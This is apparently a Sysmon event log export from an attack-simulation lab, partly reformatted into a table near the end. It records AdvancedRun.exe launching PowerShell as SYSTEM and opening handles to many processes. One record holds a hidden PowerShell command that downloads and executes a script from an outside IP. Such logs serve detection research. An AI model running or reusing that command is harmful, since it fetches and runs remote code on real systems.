20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.507{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.505{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.504{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.503{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.501{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.496{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.495{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004075880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.490{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004075380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.077{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004075373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.073{834264DD-1435-61EB-7C08-000000002702}4360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "/c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004075372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.072{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075369Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.071{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075368Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:14:45.070{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075367Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Sysmon Event ID 10 (ProcessAccess) records, 29 in this span, newest first (the flattened export places each record's System header on the line before its EventData). All 29 share the same System header and the same source-side EventData, so those are listed once; the per-record fields follow.

System (all records): EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000, Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-mhaag-attack-range-139.attackrange.local
EventData (all records): RuleName -, UtcTime 2022-01-21 (time of day per record below), SourceProcessGUID {834264DD-1435-61EB-7B08-000000002702}, SourceProcessId 5336, SourceThreadId 1504 (the flattened text reads "53361504"; the 5336/1504 split is inferred), SourceImage C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe, GrantedAccess 0x1410, SourceUser ATTACKRANGE\Administrator
CallTrace (identical in all records): C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventRecordID  UtcTime       TargetProcessGUID                        TargetProcessId  TargetImage  TargetUser
(header on the line before this span)  20:14:45.070  {834264DD-132A-61EB-5908-000000002702}  1164  C:\Windows\system32\conhost.exe  NT AUTHORITY\SYSTEM
4075366  20:14:45.070  {834264DD-132A-61EB-5808-000000002702}  3136  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  NT AUTHORITY\SYSTEM
4075365  20:14:45.070  {834264DD-12C7-61EB-4508-000000002702}  2204  C:\Windows\system32\DllHost.exe  ATTACKRANGE\Administrator
4075364  20:14:45.070  {834264DD-0F7E-61EB-C807-000000002702}  3452  C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe  ATTACKRANGE\Administrator
4075363  20:14:45.070  {834264DD-0F7E-61EB-C707-000000002702}  2228  C:\Windows\system32\conhost.exe  ATTACKRANGE\Administrator
4075362  20:14:45.069  {834264DD-0F7E-61EB-C607-000000002702}  2224  C:\Windows\system32\cmd.exe  ATTACKRANGE\Administrator
4075361  20:14:45.069  {834264DD-003D-61EB-F905-000000002702}  2420  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  NT AUTHORITY\SYSTEM
4075360  20:14:45.069  {834264DD-003D-61EB-F805-000000002702}  2928  C:\Windows\system32\conhost.exe  NT AUTHORITY\SYSTEM
4075359  20:14:45.069  {834264DD-003D-61EB-F705-000000002702}  6000  C:\Windows\System32\cmd.exe  NT AUTHORITY\SYSTEM
4075358  20:14:45.068  {834264DD-FE61-61EA-B805-000000002702}  4372  C:\Windows\system32\conhost.exe  NT AUTHORITY\SYSTEM
4075357  20:14:45.068  {834264DD-FE61-61EA-B705-000000002702}  5548  C:\Windows\System32\cmd.exe  NT AUTHORITY\SYSTEM
4075356  20:14:45.068  {834264DD-FE2D-61EA-B005-000000002702}  108  C:\Windows\system32\conhost.exe  NT AUTHORITY\SYSTEM
4075355  20:14:45.068  {834264DD-FE2D-61EA-AF05-000000002702}  5296  C:\Windows\System32\cmd.exe  NT AUTHORITY\SYSTEM
4075354  20:14:45.067  {834264DD-F392-61EA-4B04-000000002702}  948  C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE  ATTACKRANGE\Administrator
4075353  20:14:45.067  {834264DD-F392-61EA-4A04-000000002702}  5408  C:\Program Files\Internet Explorer\iexplore.exe  ATTACKRANGE\Administrator
4075352  20:14:45.067  {834264DD-E497-61EA-F401-000000002702}  2136  C:\Windows\system32\conhost.exe  ATTACKRANGE\Administrator
4075351  20:14:45.067  {834264DD-E497-61EA-F301-000000002702}  944  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  ATTACKRANGE\Administrator
4075350  20:14:45.067  {834264DD-E491-61EA-F201-000000002702}  3896  C:\Program Files\Notepad++\notepad++.exe  ATTACKRANGE\Administrator
4075349  20:14:45.066  {834264DD-DB6F-61EA-B100-000000002702}  2348  C:\Windows\System32\msdtc.exe  NT AUTHORITY\NETWORK SERVICE
4075348  20:14:45.066  {834264DD-DB13-61EA-9A00-000000002702}  5612  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe  ATTACKRANGE\Administrator
4075347  20:14:45.065  {834264DD-DB12-61EA-9900-000000002702}  5508  C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe  ATTACKRANGE\Administrator
4075346  20:14:45.065  {834264DD-DB12-61EA-9700-000000002702}  5364  C:\Windows\Sysmon64.exe  ATTACKRANGE\Administrator
4075345  20:14:45.065  {834264DD-DB11-61EA-9500-000000002702}  428  C:\Windows\Explorer.EXE  ATTACKRANGE\Administrator
4075344  20:14:45.065  {834264DD-DB10-61EA-9000-000000002702}  3336  C:\Windows\System32\taskhostw.exe  ATTACKRANGE\Administrator
